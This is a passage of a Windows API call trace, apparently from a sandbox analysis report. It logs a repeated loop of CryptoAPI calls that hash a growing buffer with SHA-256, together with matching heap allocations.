phHash=0xcdfe0) returned 1 [0176.041] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0176.041] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c2a0 [0176.041] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.041] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0176.041] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0176.042] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.042] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0176.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bb50 [0176.042] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.042] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0176.042] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0176.043] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.043] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0176.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c300 [0176.043] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.043] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0176.043] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0176.043] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.043] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0176.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b850 [0176.043] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.043] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0176.043] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.044] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.044] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0176.044] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b760 [0176.044] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.044] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0176.044] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0176.044] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.045] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0176.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bca0 [0176.045] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.045] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0176.045] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0176.045] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.045] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0176.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bb20 [0176.045] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.045] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0176.045] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0176.046] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.046] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0176.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b910 [0176.046] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.046] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0176.046] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.046] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.046] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0176.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b7c0 [0176.047] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.047] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0176.047] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0176.047] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.047] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0176.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b970 [0176.047] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.047] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0176.047] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0176.048] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.048] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0176.048] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ba90 [0176.048] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.048] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0176.048] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0176.048] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.048] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0176.048] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bac0 [0176.048] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.048] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0176.049] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.049] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.049] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0176.049] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bbe0 [0176.049] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.049] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.049] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0176.050] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.050] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0176.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bcd0 [0176.050] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.050] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0176.050] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0176.050] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.050] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0176.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6be20 [0176.050] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.050] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0176.050] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0176.051] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.051] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0176.051] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb10 [0176.051] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.051] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0176.051] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0176.052] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.052] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0176.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cdb0 [0176.052] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.052] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0176.052] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0176.052] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.052] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0176.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c900 [0176.052] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.052] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0176.052] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0176.053] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.053] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0176.053] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c450 [0176.053] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.053] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0176.053] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0176.053] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.054] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0176.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cba0 [0176.054] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.054] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0176.054] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.054] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.054] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0176.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc00 [0176.054] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.054] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.054] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.055] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.055] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0176.055] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce10 [0176.055] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.055] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.055] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0176.056] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.056] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0176.056] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c990 [0176.056] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.056] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0176.056] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0176.056] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.056] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0176.056] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c5d0 [0176.056] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.056] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0176.056] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0176.057] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.057] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0176.057] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c480 [0176.057] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.057] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0176.057] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0176.058] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.058] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0176.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c7b0 [0176.058] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.058] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0176.058] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0176.058] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.058] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0176.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c540 [0176.059] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.059] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0176.059] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.059] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.059] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0176.059] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8a0 [0176.059] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.059] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.059] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0176.060] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.060] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0176.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c7e0 [0176.060] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.060] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0176.060] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.060] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.060] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0176.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ca50 [0176.061] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0176.061] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.061] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0176.062] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.062] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0176.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c810 [0176.062] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.062] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0176.062] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0176.063] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.063] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0176.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c600 [0176.063] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.063] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0176.063] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0176.064] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.064] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0176.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ced0 [0176.064] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.064] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0176.064] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0176.064] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.064] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0176.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c390 [0176.064] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.064] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0176.064] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.065] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.065] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0176.065] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c630 [0176.065] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.065] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.065] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0176.066] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.066] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0176.066] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3c0 [0176.066] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.066] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0176.066] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.066] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.066] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0176.066] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ca80 [0176.066] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.066] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.066] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0176.067] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.067] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0176.067] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.067] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0176.067] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.068] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.068] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0176.068] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.068] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.068] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.068] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.068] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0176.068] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.068] CryptReleaseContext (hProv=0x338228d0, 